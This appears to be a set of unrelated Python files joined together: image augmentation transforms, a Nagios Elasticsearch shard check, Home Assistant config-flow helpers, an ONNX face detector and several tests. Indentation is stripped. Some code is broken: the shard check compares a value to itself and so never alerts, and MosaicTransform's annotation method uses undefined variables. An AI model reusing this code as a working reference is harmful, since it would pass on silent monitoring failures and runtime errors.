def apply_coords(self, coords):
return coords
def inverse(self):
return NoOpTransform()
def apply_segmentation(self, segmentation):
return segmentation
class PILColorTransform(ColorTransform):
"""
Generic wrapper for PIL Photometric image transforms,
which affect the color space and not the coordinate
space of the image
"""
def __init__(self, op):
"""
Args:
op (Callable): operation to be applied to the image,
which takes in a PIL Image and returns a transformed
PIL Image.
For reference on possible operations see:
- https://pillow.readthedocs.io/en/stable/
"""
if not callable(op):
raise ValueError("op parameter should be callable")
super().__init__(op)
def apply_image(self, img):
img = Image.fromarray(img)
return np.asarray(super().apply_image(img))
class EdgeFilterTransform(WrapTransform):
"""tfy
Filter an image by using Gaussian Filter
"""
def __init__(self, radius):
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
ret = Image.fromarray(img)
ret = ret.filter(ImageFilter.GaussianBlur(self.radius))
return np.asarray(ret)
def apply_coords(self, coords):
return coords
def apply_segmentation(self, segmentation):
return segmentation
def inverse(self):
return NoOpTransform()
class BoxShearTransform(WrapTransform):
"""tfy
Shear some boxes along x or y axis
"""
def __init__(self, along_x_info, along_y_info, annotations):
"""Args:
along_x_info(list[dict]): along x aixs, the info to do shear for each gt box
along_x_info(list[dict]): along y aixs, the info to do shear for each gt box
annotations(list[dict]): annotations info
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
ret = Image.fromarray(img)
for x_info in self.along_x_info:
M = x_info["M"]
new_w = x_info["new_w"]
color = x_info["color"]
anno_idx = x_info["anno_idx"]
bbox = list(map(int, self.annotations[anno_idx]["bbox"]))
box_w = bbox[2] - bbox[0]
box_h = bbox[3] - bbox[1]
#get box img to shear
cropped_img = ret.crop(bbox)
#do shear
cropped_img = cropped_img.transform((int(new_w), int(box_h)), Image.AFFINE, M, resample=Image.BILINEAR, fillcolor=color)
transformed_w, transformed_h = cropped_img.size
if transformed_w<=0 or transformed_w<=0:
return np.asarray(ret)
#shear changes size, resize it back
cropped_img = cropped_img.resize((int(box_w), int(box_h)), Image.BILINEAR)
#paste back
ret.paste(cropped_img, bbox)
for y_info in self.along_y_info:
M = y_info["M"]
new_h = y_info["new_h"]
color = y_info["color"]
anno_idx = y_info["anno_idx"]
bbox = list(map(int, self.annotations[anno_idx]["bbox"]))
box_w = bbox[2] - bbox[0]
box_h = bbox[3] - bbox[1]
#get box img to shear
cropped_img = ret.crop(bbox)
#do shear
cropped_img = cropped_img.transform((int(box_w), int(new_h)), Image.AFFINE, M, resample=Image.BILINEAR, fillcolor=color)
transformed_w, transformed_h = cropped_img.size
if transformed_w<=0 or transformed_w<=0:
return np.asarray(ret)
#shear changes size, resize it back
cropped_img = cropped_img.resize((int(box_w), int(box_h)), Image.BILINEAR)
#paste back
ret.paste(cropped_img, bbox)
return np.asarray(ret)
def apply_coords(self, coords):
return coords
def apply_segmentation(self, segmentation):
return segmentation
def inverse(self):
return NoOpTransform()
class BoxContrastTransform(WrapTransform):
def __init__(self, invert_region):
"""Args
invert_region(list): regions that computed to do invert
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
ret = Image.fromarray(img)
for region in self.invert_region:
cropped_img = ret.crop(region)
cropped_img = ImageOps.invert(cropped_img)
ret.paste(cropped_img, region)
return np.asarray(ret)
def apply_coords(self, coords):
return coords
def apply_segmentation(self, segmentation):
return segmentation
def inverse(self):
return NoOpTransform()
class NoiseTransform(WrapTransform):
def __init__(self, rate):
"""Args
rate(float): the rate pixles to be changed into noise
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
ret = Image.fromarray(img)
img_w, img_h = ret.size
noise_num = int(self.rate * img_w * img_h)
#add a random noise on a random position
for _ in range(noise_num):
x = random.randint(1, img_w-1)
y = random.randint(1, img_h-1)
noise = random.randint(0, 255)
ret.putpixel((x,y), noise)
return np.asarray(ret)
def apply_coords(self, coords):
return coords
def apply_segmentation(self, segmentation):
return segmentation
def inverse(self):
return NoOpTransform()
class BoxEraseTransform(WrapTransform):
def __init__(self, fill_region):
"""Args:
fill_region: regions to erase
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
ret = Image.fromarray(img)
#fill the region
for region in self.fill_region:
ret = fill_region(ret, region)
return np.asarray(ret)
def apply_coords(self, coords):
return coords
def apply_segmentation(self, segmentation):
return segmentation
def inverse(self):
return NoOpTransform()
class MosaicTransform(WrapTransform):
def __init__(self, mosaic_direction):
"""Args:
mosaic_direction: directions to tile img, "right" or "bottom"
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
has_mosaic_right = False
has_mosaic_bottom = False
ret = Image.fromarray(img)
for direction in self.mosaic_direction:
mosaic_img = ret.copy()
img_w, img_h = ret.size
#right
if direction=="right" and (not has_mosaic_right):
ret = ImageOps.expand(ret, border=(0, 0, img_w, 0))
ret.paste(mosaic_img, (img_w, 0))
has_mosaic_right = True
#bottom
elif not has_mosaic_bottom:
ret = ImageOps.expand(ret, border=(0, 0, 0, img_h))
ret.paste(mosaic_img, (0, img_h))
has_mosaic_bottom = True
return np.asarray(ret)
def apply_coords(self, coords):
return coords
def apply_annotations(self, annotations):
category_ids = [anno["category_id"] for anno in annotations]
has_mosaic_right = False
has_mosaic_bottom = False
for direction in self.mosaic_direction:
img_w, img_h = ret.size
#right
if direction=="right" and (not has_mosaic_right):
#repeat coords
coords = np.tile(coords, (2, 1))
#compute new boxes for right side
coords[coords.shape[0]//2:, 0] += img_w # x
has_mosaic_right = True
#bottom
elif not has_mosaic_bottom:
coords = np.tile(coords, (2, 1))
coords[coords.shape[0]//2:, 1] += img_h # y
has_mosaic_bottom = True
def apply_segmentation(self, segmentation):
segmentation = self.apply_image(segmentation)
return segmentation
def inverse(self):
return NoOpTransform()
class BoxMoveTransform(WrapTransform):
def __init__(self, move_info):
"""Args:
move_info: how to move box (rescale and paste point)
"""
super().__init__()
self._set_attributes(locals())
def apply_image(self, img):
ret = Image.fromarray(img)
for info in self.move_info:
anno_id = info["anno_id"]
anno_move_info = info["anno_move_info"]
for single_move_info in anno_move_info:
dst_size = single_move_info["dst_size"]
to_paste_point = single_move_info["to_paste_point"]
raw_box_coor = single_move_info["raw_box_coor"]
cropped_img = ret.crop(raw_box_coor)
cropped_img = cropped_img.resize(dst_size, Image.BILINEAR)
to_paste_point = list(map(int, to_paste_point))
ret.paste(cropped_img, to_paste_point)
return np.asarray(ret)
def apply_coords(self, coords):
return coords
def apply_segmentation(self, segmentation):
#TODO, not implement yet
return segmentation
def apply_annotations(self, annotations):
for info in self.move_info:
anno_id = info["anno_id"]
anno_move_info = info["anno_move_info"]
for single_move_info in anno_move_info:
anno = {}
dst_size = single_move_info["dst_size"]
to_paste_point = single_move_info["to_paste_point"]
new_box_left = to_paste_point[0]
new_box_top = to_paste_point[1]
new_box_right = to_paste_point[0] + dst_size[0]
new_box_bottom = to_paste_point[1] + dst_size[1]
anno['bbox'] = [float(new_box_left), float(new_box_top), float(new_box_right), float(new_box_bottom)]
anno['bbox_mode'] = annotations[anno_id]["bbox_mode"]
anno['category_id'] = int(annotations[anno_id]["category_id"])
annotations.append(anno)
return annotations
def inverse(self):
return NoOpTransform()
def HFlip_rotated_box(transform, rotated_boxes):
"""
Apply the horizontal flip transform on rotated boxes.
Args:
rotated_boxes (ndarray): Nx5 floating point array of
(x_center, y_center, width, height, angle_degrees) format
in absolute coordinates.
"""
# Transform x_center
rotated_boxes[:, 0] = transform.width - rotated_boxes[:, 0]
# Transform angle
rotated_boxes[:, 4] = -rotated_boxes[:, 4]
return rotated_boxes
def Resize_rotated_box(transform, rotated_boxes):
"""
Apply the resizing transform on rotated boxes. For details of how these (approximation)
formulas are derived, please refer to :meth:`RotatedBoxes.scale`.
Args:
rotated_boxes (ndarray): Nx5 floating point array of
(x_center, y_center, width, height, angle_degrees) format
in absolute coordinates.
"""
scale_factor_x = transform.new_w * 1.0 / transform.w
scale_factor_y = transform.new_h * 1.0 / transform.h
rotated_boxes[:, 0] *= scale_factor_x
rotated_boxes[:, 1] *= scale_factor_y
theta = rotated_boxes[:, 4] * np.pi / 180.0
c = np.cos(theta)
s = np.sin(theta)
rotated_boxes[:, 2] *= np.sqrt(np.square(scale_factor_x * c) + np.square(scale_factor_y * s))
rotated_boxes[:, 3] *= np.sqrt(np.square(scale_factor_x * s) + np.square(scale_factor_y * c))
rotated_boxes[:, 4] = np.arctan2(scale_factor_x * s, scale_factor_y * c) * 180 / np.pi
return rotated_boxes
HFlipTransform.register_type("rotated_box", HFlip_rotated_box)
ResizeTransform.register_type("rotated_box", Resize_rotated_box)
# not necessary any more with latest fvcore
NoOpTransform.register_type("rotated_box", lambda t, x: x)
|
from typing import List
def rose_smell_increase(roses: List[int]) -> int:
n, max_sub = len(roses), 0
forward, backward = [1 for _ in range(n)], [1 for _ in range(n)]
for i in range(1, n):
if roses[i] > roses[i - 1]:
forward[i] = forward[i - 1] + 1
else:
max_sub = max(max_sub, forward[i - 1])
max_sub = max(max_sub, forward[-1])
for i in range(n - 2, -1, -1):
print(i)
if roses[i] < roses[i + 1]:
backward[i] = backward[i + 1] + 1
# Calculate the maximum length of the
# strictly increasing subarray without
# removing any element
# max_sub, length_sub = 0, 1
# for i in range(1, n):
# if roses[i] > roses[i - 1]:
# length_sub += 1
# else:
# length_sub = 1
# max_sub = max(max_sub, length_sub)
# Calculate the maximum length of the
# strictly increasing subarray after
# removing the current element
for i in range(1, n - 1):
if roses[i - 1] < roses[i + 1]:
max_sub = max(max_sub, forward[i - 1] + backward[i + 1])
return max_sub
|
#!/usr/bin/python
from nagioscheck import NagiosCheck, UsageError
from nagioscheck import PerformanceMetric, Status
import urllib2
import optparse
try:
import json
except ImportError:
import simplejson as json
class ESShardsCheck(NagiosCheck):
def __init__(self):
NagiosCheck.__init__(self)
self.add_option('H', 'host', 'host', 'The cluster to check')
self.add_option('P', 'port', 'port', 'The ES port - defaults to 9200')
def check(self, opts, args):
host = opts.host
port = int(opts.port or '9200')
try:
response = urllib2.urlopen(r'http://%s:%d/_cluster/health'
% (host, port))
except urllib2.HTTPError, e:
raise Status('unknown', ("API failure", None,
"API failure:\n\n%s" % str(e)))
except urllib2.URLError, e:
raise Status('critical', (e.reason))
response_body = response.read()
try:
es_cluster_health = json.loads(response_body)
except ValueError:
raise Status('unknown', ("API returned nonsense",))
unassigned_shards = es_cluster_health['unassigned_shards']
if es_cluster_health['unassigned_shards'] != unassigned_shards:
raise Status('CRITICAL',
"There are '%s' unassigned shards in the cluster"
% (unassigned_shards))
else:
raise Status('OK',
"All shards in the cluster are currently assigned")
if __name__ == "__main__":
ESShardsCheck().run()
|
# @Author: Varoon Pazhyanur <varoon>
# @Date: 28-08-2017
# @Filename: image_combine.py
# @Last modified by: varoon
# @Last modified time: 28-08-2017
import cv2
import numpy as np
#GOAL: put the opencv logo on an image and make it opaque(rather than transparent)
messi = cv2.imread("messi5.jpg")
cv_logo = cv2.imread("opencv-logo.png")
rows,cols,channels = cv_logo.shape
roi = messi[0:rows, 0:cols] #going to put logo in top left
#using a mask because the CV logo is not a rectangle. Find pixels of interest with threshold.
cv_logo_grey = cv2.cvtColor(cv_logo, cv2.COLOR_BGR2GRAY)
ret,mask = cv2.threshold(cv_logo_grey,10,255,cv2.THRESH_BINARY) #THRESHOLD IMAGE
mask_inv = cv2.bitwise_not(mask)
messi_bg=cv2.bitwise_and(roi,roi,mask = mask_inv)
cv_logo_fg = cv2.bitwise_and(cv_logo,cv_logo,mask=mask)
cv2.imshow("test",mask)
res = cv2.add(messi_bg, cv_logo_fg)
messi[0:rows, 0:cols] = res
cv2.imshow("Messi and CV Logo", messi)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
"""Helpers for data entry flows for helper config entries."""
from __future__ import annotations
from abc import abstractmethod
from collections.abc import Callable, Mapping
import copy
from dataclasses import dataclass
from typing import Any
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.core import HomeAssistant, callback, split_entity_id
from homeassistant.data_entry_flow import FlowResult, UnknownHandler
from . import entity_registry as er
class HelperFlowError(Exception):
"""Validation failed."""
@dataclass
class HelperFlowStep:
"""Define a helper config or options flow step."""
# Optional schema for requesting and validating user input. If schema validation
# fails, the step will be retried. If the schema is None, no user input is requested.
schema: vol.Schema | None
# Optional function to validate user input.
# The validate_user_input function is called if the schema validates successfully.
# The validate_user_input function is passed the user input from the current step.
# The validate_user_input should raise HelperFlowError is user input is invalid.
validate_user_input: Callable[[dict[str, Any]], dict[str, Any]] = lambda x: x
# Optional function to identify next step.
# The next_step function is called if the schema validates successfully or if no
# schema is defined. The next_step function is passed the union of config entry
# options and user input from previous steps.
# If next_step returns None, the flow is ended with RESULT_TYPE_CREATE_ENTRY.
next_step: Callable[[dict[str, Any]], str | None] = lambda _: None
class HelperCommonFlowHandler:
"""Handle a config or options flow for helper."""
def __init__(
self,
handler: HelperConfigFlowHandler | HelperOptionsFlowHandler,
flow: dict[str, HelperFlowStep],
config_entry: config_entries.ConfigEntry | None,
) -> None:
"""Initialize a common handler."""
self._flow = flow
self._handler = handler
self._options = dict(config_entry.options) if config_entry is not None else {}
async def async_step(
self, step_id: str, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle a step."""
next_step_id: str = step_id
if user_input is not None and self._flow[next_step_id].schema is not None:
# Do extra validation of user input
try:
user_input = self._flow[next_step_id].validate_user_input(user_input)
except HelperFlowError as exc:
return self._show_next_step(next_step_id, exc, user_input)
if user_input is not None:
# User input was validated successfully, update options
self._options.update(user_input)
if self._flow[next_step_id].next_step and (
user_input is not None or self._flow[next_step_id].schema is None
):
# Get next step
next_step_id_or_end_flow = self._flow[next_step_id].next_step(self._options)
if next_step_id_or_end_flow is None:
# Flow done, create entry or update config entry options
return self._handler.async_create_entry(data=self._options)
next_step_id = next_step_id_or_end_flow
return self._show_next_step(next_step_id)
def _show_next_step(
self,
next_step_id: str,
error: HelperFlowError | None = None,
user_input: dict[str, Any] | None = None,
) -> FlowResult:
"""Show step for next step."""
options = dict(self._options)
if user_input:
options.update(user_input)
if (data_schema := self._flow[next_step_id].schema) and data_schema.schema:
# Make a copy of the schema with suggested values set to saved options
schema = {}
for key, val in data_schema.schema.items():
new_key = key
if key in options and isinstance(key, vol.Marker):
# Copy the marker to not modify the flow schema
new_key = copy.copy(key)
new_key.description = {"suggested_value": options[key]}
schema[new_key] = val
data_schema = vol.Schema(schema)
errors = {"base": str(error)} if error else None
# Show form for next step
return self._handler.async_show_form(
step_id=next_step_id, data_schema=data_schema, errors=errors
)
class HelperConfigFlowHandler(config_entries.ConfigFlow):
"""Handle a config flow for helper integrations."""
config_flow: dict[str, HelperFlowStep]
options_flow: dict[str, HelperFlowStep] | None = None
VERSION = 1
# pylint: disable-next=arguments-differ
def __init_subclass__(cls, **kwargs: Any) -> None:
"""Initialize a subclass."""
super().__init_subclass__(**kwargs)
@callback
def _async_get_options_flow(
config_entry: config_entries.ConfigEntry,
) -> config_entries.OptionsFlow:
"""Get the options flow for this handler."""
if cls.options_flow is None:
raise UnknownHandler
return HelperOptionsFlowHandler(
config_entry, cls.options_flow, cls.async_options_flow_finished
)
# Create an async_get_options_flow method
cls.async_get_options_flow = _async_get_options_flow # type: ignore[assignment]
# Create flow step methods for each step defined in the flow schema
for step in cls.config_flow:
setattr(cls, f"async_step_{step}", cls._async_step)
def __init__(self) -> None:
"""Initialize config flow."""
self._common_handler = HelperCommonFlowHandler(self, self.config_flow, None)
@classmethod
@callback
def async_supports_options_flow(
cls, config_entry: config_entries.ConfigEntry
) -> bool:
"""Return options flow support for this handler."""
return cls.options_flow is not None
async def _async_step(self, user_input: dict[str, Any] | None = None) -> FlowResult:
"""Handle a config flow step."""
step_id = self.cur_step["step_id"] if self.cur_step else "user"
result = await self._common_handler.async_step(step_id, user_input)
return result
# pylint: disable-next=no-self-use
@abstractmethod
@callback
def async_config_entry_title(self, options: Mapping[str, Any]) -> str:
"""Return config entry title.
The options parameter contains config entry options, which is the union of user
input from the config flow steps.
"""
@callback
def async_config_flow_finished(self, options: Mapping[str, Any]) -> None:
"""Take necessary actions after the config flow is finished, if needed.
The options parameter contains config entry options, which is the union of user
input from the config flow steps.
"""
@callback
@staticmethod
def async_options_flow_finished(
hass: HomeAssistant, options: Mapping[str, Any]
) -> None:
"""Take necessary actions after the options flow is finished, if needed.
The options parameter contains config entry options, which is the union of stored
options and user input from the options flow steps.
"""
@callback
def async_create_entry( # pylint: disable=arguments-differ
self,
data: Mapping[str, Any],
**kwargs: Any,
) -> FlowResult:
"""Finish config flow and create a config entry."""
self.async_config_flow_finished(data)
return super().async_create_entry(
data={}, options=data, title=self.async_config_entry_title(data), **kwargs
)
class HelperOptionsFlowHandler(config_entries.OptionsFlow):
"""Handle an options flow for helper integrations."""
def __init__(
self,
config_entry: config_entries.ConfigEntry,
options_flow: dict[str, vol.Schema],
async_options_flow_finished: Callable[[HomeAssistant, Mapping[str, Any]], None],
) -> None:
"""Initialize options flow."""
self._common_handler = HelperCommonFlowHandler(self, options_flow, config_entry)
self._config_entry = config_entry
self._async_options_flow_finished = async_options_flow_finished
for step in options_flow:
setattr(self, f"async_step_{step}", self._async_step)
async def _async_step(self, user_input: dict[str, Any] | None = None) -> FlowResult:
"""Handle an options flow step."""
# pylint: disable-next=unsubscriptable-object # self.cur_step is a dict
step_id = self.cur_step["step_id"] if self.cur_step else "init"
return await self._common_handler.async_step(step_id, user_input)
@callback
def async_create_entry( # pylint: disable=arguments-differ
self,
data: Mapping[str, Any],
**kwargs: Any,
) -> FlowResult:
"""Finish config flow and create a config entry."""
self._async_options_flow_finished(self.hass, data)
return super().async_create_entry(title="", data=data, **kwargs)
@callback
def wrapped_entity_config_entry_title(
hass: HomeAssistant, entity_id_or_uuid: str
) -> str:
"""Generate title for a config entry wrapping a single entity.
If the entity is registered, use the registry entry's name.
If the entity is in the state machine, use the name from the state.
Otherwise, fall back to the object ID.
"""
registry = er.async_get(hass)
entity_id = er.async_validate_entity_id(registry, entity_id_or_uuid)
object_id = split_entity_id(entity_id)[1]
entry = registry.async_get(entity_id)
if entry:
return entry.name or entry.original_name or object_id
state = hass.states.get(entity_id)
if state:
return state.name or object_id
return object_id
|
"""
This code uses the onnx model to detect faces from live video or cameras.
"""
import sys
#import time
import argparse
import cv2
import numpy as np
import onnx
from caffe2.python.onnx import backend
import onnxruntime as ort
import vision.utils.box_utils_numpy as box_utils
def predict(width,
height,
confidences,
boxes,
prob_threshold,
iou_threshold=0.3,
top_k=-1):
boxes = boxes[0]
confidences = confidences[0]
picked_box_probs = []
picked_labels = []
for class_index in range(1, confidences.shape[1]):
probs = confidences[:, class_index]
mask = probs > prob_threshold
probs = probs[mask]
if probs.shape[0] == 0:
continue
subset_boxes = boxes[mask, :]
box_probs = np.concatenate(
[subset_boxes, probs.reshape(-1, 1)], axis=1)
box_probs = box_utils.hard_nms(
box_probs, iou_threshold=iou_threshold, top_k=top_k)
picked_box_probs.append(box_probs)
picked_labels.extend([class_index] * box_probs.shape[0])
if not picked_box_probs:
return np.array([]), np.array([]), np.array([])
picked_box_probs = np.concatenate(picked_box_probs)
picked_box_probs[:, 0] *= width
picked_box_probs[:, 1] *= height
picked_box_probs[:, 2] *= width
picked_box_probs[:, 3] *= height
return picked_box_probs[:, :4].astype(
np.int32), np.array(picked_labels), picked_box_probs[:, 4]
def parse_args():
parser = argparse.ArgumentParser(description="face detection")
parser.add_argument(
"--input", type=str, default="", help="input file path")
parser.add_argument(
"--model",
type=str,
default="models/onnx/version-RFB-320.onnx",
help="model file path")
return parser.parse_args()
def main():
args = parse_args()
onnx_path = args.model
predictor = onnx.load(onnx_path)
onnx.checker.check_model(predictor)
onnx.helper.printable_graph(predictor.graph)
predictor = backend.prepare(predictor, device="CPU") # default CPU
ort_session = ort.InferenceSession(onnx_path)
input_name = ort_session.get_inputs()[0].name
cap = cv2.VideoCapture(args.input)
threshold = 0.7
frame = 0
while True:
# TODO: pipeline reading/conversion and inference
_, orig_image = cap.read()
if orig_image is None:
print("no img", file=sys.stderr)
break
image = cv2.cvtColor(orig_image, cv2.COLOR_BGR2RGB)
image = cv2.resize(image, (320, 240))
# image = cv2.resize(image, (640, 480))
image_mean = np.array([127, 127, 127])
image = (image - image_mean) / 128
image = np.transpose(image, [2, 0, 1])
image = np.expand_dims(image, axis=0)
image = image.astype(np.float32)
#time_time = time.time()
confidences, boxes = ort_session.run(None, {input_name: image})
# print("cost time: {}".format(time.time() - time_time))
boxes, _, _ = predict(orig_image.shape[1], orig_image.shape[0],
confidences, boxes, threshold)
print("frame %06d box count: %d" % (frame, len(boxes)))
frame = frame + 1
if __name__ == '__main__':
main()
|
from scheduler.problem import Instance, InstanceSolution
from collections import deque
def solve(instance: Instance) -> InstanceSolution:
"""Solves the P||Cmax problem by using a greedy algorithm.
:param instance: valid problem instance
:return: generated solution of a given problem instance
"""
processors = [[0, deque([])] for _ in range(instance.processors_number)]
for task_index, task_duration in enumerate(instance.tasks_durations):
free_processor = min(enumerate(processors), key=lambda x: x[1][0])[0]
processors[free_processor][0] += task_duration
processors[free_processor][1].append(task_index)
result_processors = list(map(lambda x: list(x[1]), processors))
return InstanceSolution(instance, result_processors)
__all__ = ["solve"]
|
# Copyright (c) 2020, Xilinx
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of FINN nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import pytest
import pkg_resources as pk
from shutil import copytree
from finn.util.basic import make_build_dir
from finn.builder.build_dataflow import build_dataflow_directory
import os
@pytest.mark.slow
@pytest.mark.vivado
def test_build_dataflow_directory():
test_dir = make_build_dir("test_build_dataflow_directory_")
target_dir = test_dir + "/build_dataflow"
example_data_dir = pk.resource_filename("finn.qnn-data", "build_dataflow/")
copytree(example_data_dir, target_dir)
build_dataflow_directory(target_dir)
# check the generated files
output_dir = target_dir + "/output_tfc_w1a1_Pynq-Z1"
assert os.path.isfile(output_dir + "/time_per_step.json")
assert os.path.isfile(output_dir + "/final_hw_config.json")
assert os.path.isfile(output_dir + "/stitched_ip/ip/component.xml")
assert os.path.isfile(output_dir + "/driver/driver.py")
assert os.path.isfile(output_dir + "/report/estimate_layer_cycles.json")
assert os.path.isfile(output_dir + "/report/estimate_layer_resources.json")
assert os.path.isfile(
output_dir + "/report/estimate_layer_config_alternatives.json"
)
assert os.path.isfile(output_dir + "/report/estimate_network_performance.json")
assert os.path.isfile(output_dir + "/report/ooc_synth_and_timing.json")
assert os.path.isfile(output_dir + "/report/rtlsim_performance.json")
assert os.path.isfile(output_dir + "/bitfile/finn-accel.bit")
assert os.path.isfile(output_dir + "/bitfile/finn-accel.hwh")
assert os.path.isfile(output_dir + "/report/post_synth_resources.xml")
assert os.path.isfile(output_dir + "/report/post_route_timing.rpt")
# verification outputs
verify_out_dir = output_dir + "/verification_output"
assert os.path.isfile(verify_out_dir + "/verify_initial_python_SUCCESS.npy")
assert os.path.isfile(verify_out_dir + "/verify_streamlined_python_SUCCESS.npy")
assert os.path.isfile(verify_out_dir + "/verify_folded_hls_cppsim_SUCCESS.npy")
assert os.path.isfile(verify_out_dir + "/verify_stitched_ip_rtlsim_SUCCESS.npy")
|
import json
import os
import pytest
from json_expand_o_matic import JsonExpandOMatic
class TestLeaves:
"""Test `leaf_node` functionality."""
# Our raw test data.
_raw_data = None
@pytest.fixture
def raw_data(self, resource_path_root):
if not TestLeaves._raw_data:
TestLeaves._raw_data = json.loads((resource_path_root / "actor-data.json").read_text())
return TestLeaves._raw_data
# Fixtures to provide copies of the raw data to each test function.
@pytest.fixture
def test_data(self, raw_data):
return json.loads(json.dumps(raw_data))
@pytest.fixture
def original_data(self, raw_data):
return json.loads(json.dumps(raw_data))
def test_actors1(self, tmpdir, test_data, original_data):
"""Verify that we can create a json file for each actor and not recurse any further."""
self._actors_test(tmpdir, test_data, original_data, "/root/actors/.*")
def test_actors2(self, tmpdir, test_data, original_data):
"""Same as test_actors1 but with a more precise regex."""
self._actors_test(tmpdir, test_data, original_data, "/root/actors/[^/]+")
def test_charlie1(self, tmpdir, test_data, original_data):
"""Verify that we can single out an actor."""
self._charlie_test(tmpdir, test_data, original_data, "/root/actors/charlie_chaplin")
def test_charlie2(self, tmpdir, test_data, original_data):
"""Like test_charlie1 but with a loose wildcard."""
self._charlie_test(tmpdir, test_data, original_data, "/root/actors/[abcxyz].*")
def test_charlie3(self, tmpdir, test_data, original_data):
"""Like test_charlie1 but with tighter regex."""
self._charlie_test(tmpdir, test_data, original_data, "/root/actors/[abcxyz][^/]+")
def test_nested1(self, tmpdir, test_data, original_data):
"""Test a simple leaf_nodes scenario."""
expanded = JsonExpandOMatic(path=tmpdir).expand(
test_data,
root_element="root",
preserve=False,
leaf_nodes=[{"/root/actors/.*": ["/[^/]+/movies/.*", "/[^/]+/filmography"]}],
)
assert expanded == {"root": {"$ref": f"{tmpdir.basename}/root.json"}}
# This is the same thing you would expect in the non-nested case.
self._assert_root(tmpdir)
self._assert_actors(tmpdir)
# Unlike the non-nested case with regex "/root/actors/.*", the nested case
# will have a directory per actor.
# See the discussion in test_nested1_equivalency on why this is.
self._assert_actor_dirs(tmpdir)
# The nested "/[^/]+/movies/.*" gives us a file-per-movie
self._assert_movies(tmpdir)
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/movies/modern_times.json")
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/movies/0.json")
# It is also worth noting that other dicts not explicitly mentiond in the list
# of nested expressions are given no special treatment.
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses.json")
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses")
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses/oona_oneill.json")
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses/oona_oneill")
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses/oona_oneill/children.json")
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/hobbies.json")
assert not os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/hobbies")
def test_nested1_equivalency(self, tmpdir, test_data, original_data):
"""
In a nested leaf-node expression the dict key is treated as it
would be in the non-nested case.
The nested functionality takes the file written by that expression
and feeds it back through JsonExpandOMatic with the dict's value
as the new leaf_nodes parameter value.
You can represent any of the nested expressions as non-tested but,
IMO, nested expressions can be easier to follow in some cases.
"""
import glob
JsonExpandOMatic(path=f"{tmpdir}/n").expand(
test_data,
root_element="root",
preserve=False,
leaf_nodes=[{"/root/actors/.*": ["/[^/]+/movies/.*", "/[^/]+/filmography"]}],
)
nested_files = [x.replace(f"{tmpdir}/n", "") for x in glob.glob(f"{tmpdir}/n", recursive=True)]
JsonExpandOMatic(path=f"{tmpdir}/f").expand(
test_data,
root_element="root",
preserve=False,
leaf_nodes=["/root/actors/.*/movies/.*", "/root/actors/.*/filmography"],
)
flattened_files = [x.replace(f"{tmpdir}/f", "") for x in glob.glob(f"{tmpdir}/f", recursive=True)]
assert nested_files == flattened_files
def test_nested2(self, tmpdir, test_data, original_data):
"""Test a targeted leaf_node exmple.
The expressions listed in the dict value are relative to the
element matched by the dict key expression.
Our previous examlpes used a regex to ignore that but we can do
interesting things with it if we want.
In this example we will collapse all of Dwayne Johnson's movies
and Charlie Chaplin's spouses.
"""
expanded = JsonExpandOMatic(path=tmpdir).expand(
test_data,
root_element="root",
preserve=False,
leaf_nodes=[{"/root/actors/.*": ["/dwayne_johnson/movies", "/charlie_chaplin/spouses"]}],
)
assert expanded == {"root": {"$ref": f"{tmpdir.basename}/root.json"}}
# This is the same thing you would expect in the non-nested case.
self._assert_root(tmpdir)
self._assert_actors(tmpdir)
# Unlike the non-nested case with regex "/root/actors/.*", the nested case
# will have a directory per actor.
# See the discussion in test_nested1_equivalency on why this is.
self._assert_actor_dirs(tmpdir)
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/movies.json")
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/movies")
assert os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses.json")
assert not os.path.exists(f"{tmpdir}/root/actors/charlie_chaplin/spouses")
assert os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/movies.json")
assert not os.path.exists(f"{tmpdir}/root/actors/dwayne_johnson/movies")
def xtest_enhanced_nested1(self, tmpdir, test_data, original_data):
"""Enhanced nested #1...
But what if we want a single json file per actor to include
everything about that actor _except_ movies and a separate
